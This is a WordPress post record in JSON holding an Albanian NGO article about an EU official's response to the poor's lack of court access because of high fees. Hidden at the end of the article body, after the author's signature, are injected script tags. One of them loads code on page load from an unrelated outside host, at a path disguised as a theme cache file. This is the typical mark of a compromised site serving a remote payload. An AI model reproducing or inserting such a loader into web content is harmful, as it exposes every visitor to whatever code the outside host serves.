{"id":500,"date":"2013-01-30T12:02:52","date_gmt":"2013-01-30T10:02:52","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=500"},"modified":"2013-09-30T12:04:22","modified_gmt":"2013-09-30T10:04:22","slug":"aksesi-ne-drejtesi-deshtim-i-shqiperise","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=500","title":{"rendered":"Aksesi n\u00eb drejt\u00ebsi, d\u00ebshtim i Shqip\u00ebris\u00eb"},"content":{"rendered":"<p>M\u00eb 12 tetor ambasadori i BE Ettore Sequi priti n\u00eb nj\u00eb takim aktivist\u00eb t\u00eb shoq\u00ebris\u00eb civile, p\u00ebr t\u2019u prezantuar atyre progress raportin e fundit t\u00eb Shqip\u00ebris\u00eb. P\u00ebrfaq\u00ebsuesi i Res Publica Dorian Matlija, i drejtoi ambasadorit pyetjen e m\u00ebposhtme:<\/p>\n<p><i>Pyetje: Duke lexuar raportin e fundit t\u00eb progresit, vura se n\u00eb faqen 17 ngrini shqet\u00ebsimin q\u00eb grupe vulnerabile nuk kan\u00eb mund\u00ebsi t\u00eb ken\u00eb akses n\u00eb gjykat\u00eb p\u00ebr shkak t\u00eb tarifave t\u00eb larta. Duke qen\u00eb se numri i individ\u00ebve t\u00eb k\u00ebtyre grupeve vulnerabile mund t\u00eb shkoj\u00eb deri n\u00eb 400 mij\u00eb shqiptar\u00eb, nisur edhe nga statistikat e personave q\u00eb jetojn\u00eb n\u00eb nivelet e minimumit jetik, a e konsideroni zgjidhjen e k\u00ebsaj c\u00ebshtjeje si emergjente, e cila duhet t\u00eb trajtohet bashk<i>\u00eb<\/i>\u00a0me aspektet e tjera t\u00eb reform\u00ebs n\u00eb drejt\u00ebsi?<\/i><\/p>\n<p>Shefi i Seksionit t<i>\u00eb<\/i>\u00a0Politik\u00ebs, Ekonomis\u00eb dhe Informacionit, Z. Clive Rumbold, i autorizuar p<i>\u00eb<\/i>r t\u2019u pergjigjur nga ambasadori Ettore Sequi, u p\u00ebrgjigj:<\/p>\n<p><i>P<i>\u00eb<\/i>rgjigje: Ky \u00ebsht\u00eb nj\u00eb problem shum\u00eb i madh, sepse aksesi n\u00eb gjykat\u00eb \u00ebsht\u00eb shum\u00eb i r\u00ebnd\u00ebsish\u00ebm n\u00eb nj\u00eb shoq\u00ebri demokratike. Ne kemi informacione nga organizata t\u00eb ndryshme rreth k\u00ebtij problemi q\u00eb \u00ebsht\u00eb ende i pazgjidhur. Sigurisht q\u00eb ka lidhje me reformat n\u00eb drejt\u00ebsi, por mendoj se nuk \u00ebsht\u00eb vet\u00ebm problem i ligjeve por edhe i implemetimit t\u00eb tyre, pasi ka probleme n\u00eb marr\u00ebdh\u00ebniet dhe koordinimin mes intitucioneve. Mungesa e gjetjes s\u00eb nj\u00eb zgjidhjeje deri tani p\u00ebr sigurimin e aksesit n<i>\u00eb<\/i>\u00a0gjykat<i>\u00eb<\/i>\u00a0t<i>\u00eb<\/i>\u00a0personave t<i>\u00eb<\/i>\u00a0varf<i>\u00eb<\/i>r\u00a0<i>\u00eb<\/i>sht<i>\u00eb<\/i>\u00a0nj<i>\u00eb<\/i>\u00a0d<i>\u00eb<\/i>shtim. P\u00ebrderisa ne e kemi publikuar edhe n\u00eb progres raport k\u00ebt\u00eb fakt, do t\u00eb thot\u00eb q\u00eb ne e kemi n\u00eb v\u00ebmendjen ton\u00eb si problem dhe se n\u00eb t\u00eb ardhmen do t\u00eb vazhdojm\u00eb t\u00eb k\u00ebrkojm\u00eb prej qeveris\u00eb shqiptare q\u00eb t\u00eb zgjidh\u00eb p\u00ebrfundimisht k\u00ebt\u00eb problem.<\/i><\/p>\n<p>Lajmi p\u00ebr takimin u publikua edhe n\u00eb faqen zyrtare t\u00eb Eu Info Centre\u00a0<a href=\"http:\/\/euinfocentre.al\/content.aspx?idjadok=333&amp;k=17\">http:\/\/euinfocentre.al\/content.aspx?idjadok=333&amp;k=17<\/a>.<\/p>\n<p>N\u00eb p\u00ebrfundim p\u00ebrfaq\u00ebsuesit e BE falenderuan p\u00ebrfaq\u00ebsuesin e Res Publica p\u00ebr pyetjen e b\u00ebr\u00eb, sepse c\u00ebshtja n\u00eb fjal\u00eb \u00ebsht\u00eb e nj\u00eb r\u00ebnd\u00ebsie t\u00eb vecant\u00eb. Trajtimi i k\u00ebsaj c\u00ebshtjeje b\u00ebhet n\u00eb nj\u00eb koh\u00eb kur Gjykata e Rrethit Gjyq\u00ebsor Tiran\u00eb dhe Gjykata e Rrethit Gjyq\u00ebsor Pogradec kan\u00eb k\u00ebrkuar nga Gjykata Kushtetuese shfuqizimin e ligjit p\u00ebr taksat dhe tarifat n\u00eb pjes\u00ebn q\u00eb ai prek tarifat e ngritjes s\u00eb padis\u00eb n\u00eb gjykat\u00eb. Gjykata Kushtetuese ende nuk ka marr\u00eb nj\u00eb vendim p\u00ebr c\u00ebshtjen n\u00eb fjal\u00eb, por qendrimi i BE ndaj k\u00ebtij problemi duket se p\u00ebrb\u00ebn nj\u00eb orientim t\u00eb sakt\u00eb p\u00ebr institucionet shqiptare t\u00eb cdo niveli.<\/p>\n<p>Res Publica, me mb\u00ebshtetjen e Fondacionit \u201cShoq\u00ebria e Hapur p\u00ebr Shqip\u00ebrin\u00eb\u201d, po p\u00ebrpiqet t\u00eb gjej\u00eb cdo form\u00eb t\u00eb mundshme p\u00ebr zgjidhjen e problemit q\u00eb lidhet me aksesin n\u00eb drejt\u00ebsi t\u00eb personave t\u00eb varf\u00ebr. Beteja vazhdon, por r\u00ebnd\u00ebsi t\u00eb vecant\u00eb merr p\u00ebrkrahja e k\u00ebsaj kauze edhe nga BE, e cila n\u00eb m\u00ebnyr\u00eb t\u00eb p\u00ebrs\u00ebritur n\u00eb cdo raport, krahas OSBE ka theksuar d\u00ebshtimin e Shqip\u00ebris\u00eb n\u00eb sigurimin e aksesit n\u00eb drejt\u00ebsi p\u00ebr qindra mij\u00ebra shqiptar\u00eb t\u00eb varf\u00ebr.<\/p>\n<p>D. Matlija<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>M\u00eb 12 tetor ambasadori i BE Ettore Sequi priti n\u00eb nj\u00eb takim aktivist\u00eb t\u00eb shoq\u00ebris\u00eb civile, p\u00ebr t\u2019u prezantuar atyre [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":501,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6,5],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/500"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=500"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/500\/revisions"}],"predecessor-version":[{"id":502,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/500\/revisions\/502"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/501"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}